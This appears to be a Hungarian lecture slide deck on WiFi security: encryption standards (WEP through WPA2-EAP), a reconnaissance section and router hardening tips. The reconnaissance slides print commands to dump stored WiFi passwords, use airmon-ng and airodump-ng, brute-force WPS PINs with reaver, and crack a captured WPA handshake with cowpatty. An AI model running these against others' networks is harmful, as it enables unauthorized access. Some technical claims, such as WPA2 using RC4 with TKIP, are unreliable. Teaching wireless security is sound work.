9. A WiFi hálózatok biztonsága
A vezeték nélküli WIFI hálózatban a csomagokat titkosítottan továbbítják. WEP A legegyszerűbb a WEP (Wired Equivalent Privacy) (1997-2003), 40 vagy 104 bit kulcshosszú adatfolyam titkosítás. Viszonylag könnyen törhető (kulcs-megszerzéses támadás key recovery attack eljárással), sőt a WEPben lévő kevéssé biztonságos ellenőrzőszám (cyclic redundancy check CRC) lehetővé teszi a letöltött csomagok módosítását és a CRC-összeg átírását a WEP kulcs ismerete nélkül is. Még sokan használják. 2
A vezeték nélküli WIFI hálózatban a csomagokat titkosítottan továbbítják. WPA Átmenetileg bevezették a WPA (Wi-Fi Protected Access) titkosítást, a WEP-el azonos hardveren. 3
A vezeték nélküli WIFI hálózatban a csomagokat titkosítottan továbbítják. WPA2 A ma ajánlott titkosítás a WPA2. Az adat titkosítás az RC4 adatfolyam-titkosítóval történik, 128-bit kulcs használatával és egy 48 bites induló vektorral. A legfontosabb fejlesztés a WPA-n belül a WEPhez képest a TKIP bevezetése, amely dinamikusan változtatja az alkalmazott kulcsokat. 4
A vezeték nélküli WIFI hálózatban a csomagokat titkosítottan továbbítják. WPA2-PSK A ma ajánlott titkosítás a WPA2. A Personal (WPA-PSK, "osztott kulcs preshared key) módban a megadandó jelszónak hosszabbnak kell lennie, mint a jellegzetes 6-8 karakter. A maximális WPA-PSK védelemhez (256 bit) olyan kulcs kell, ami 54 véletlenszerű karaktert, vagy 39 véletlenszerű ASCII karaktert tartalmaz. 5
A vezeték nélküli WIFI hálózatban a csomagokat titkosítottan továbbítják. WPA2-EAP A ma ajánlott titkosítás a WPA2. EAP (Extensible Authentication Protocol bővíthető hitelesítési protokoll) a céges titkosítási megoldások összefoglaló neve. 6
WIFI hálózat felderítése A saját gépről valaha belépett wifi hálózatok adatainak listázása: [Windows] (fusson a wlansvc service!) netsh wlan show profile [Linux] cat /etc/networkmanager/system-connections/* [OS/X] security find-generic-password -wa [SSID] 7
WIFI hálózat felderítése A wifi-kártya átkapcsolása monitor módba (így azokat a hálózatokat is figyeli, ahova nem jelentkezett még be). [Windows] ipconfig airmon-ng start wlp2s0 [Linux] iwconfig airmon-ng start wlp2s0 8
WIFI hálózat felderítése A wifi-kártya átkapcsolása monitor módba (így azokat a hálózatokat is figyeli, ahova nem jelentkezett még be). 9
WIFI hálózat felderítése Az elérhető hálózatok adatainak listázása: airodump-ng mon0 10
WIFI hálózat felderítése A WIFI-router WPS (Wifi Protected Setup) jelszavának (PIN) keresése brute-force módszerrel a 3-as csatornát figyelve (sok órán keresztül megy!): reaver -i mon0 -b AC:22:05:4C:97:EA -c 3 -f -vv 11
WIFI hálózat felderítése A WIFI-router WPS (Wifi Protected Setup) jelszavának (PIN) keresése brute-force módszerrel 12
WIFI hálózat felderítése A WIFI-router WPS (Wifi Protected Setup) jelszavának (PIN) keresése brute-force módszerrel 13
WIFI hálózat felderítése Az elküldött adatcsomagok sniff nevű fájlba írása (sniffelése) a MAC című router 9-es csatornáján jövő csomagokból. airodump-ng --bssid D8:5D:4C:DF:27:EC -c 9 -w sniff mon0 Megvárjuk a WPA handshake üzenetet, utána a sniff.cap nevű állományból ki kell keresni a jelszót: cowpatty -f szotarfile.txt -r sniff.cap -s 14
WIFI hálózat védelme Tiltsuk le az SSID közzétételét: 15
WIFI hálózat védelme Tiltsuk le a WPS (Wifi Protected Setup) PIN-en keresztüli elérését: 16
WIFI hálózat védelme Tiltsuk le a modem távoli hálózatból való elérését: 17
WIFI hálózat védelme Szűrjünk MAC címekre! Csak az itt felsorolt MAC című eszközök csomagjait fogadjuk el és továbbítjuk. 18
WIFI hálózat védelme Kapcsoljuk be a tűzfalat! Különböző szintű protokollok figyelésén alapuló szűréseket kapcsolatunk be: 19
WIFI hálózat védelme Szűrjünk IP címekre és portokra! Ezek csomagszűrő tűzfal jellegű korlátozások: 20
VÉGE 21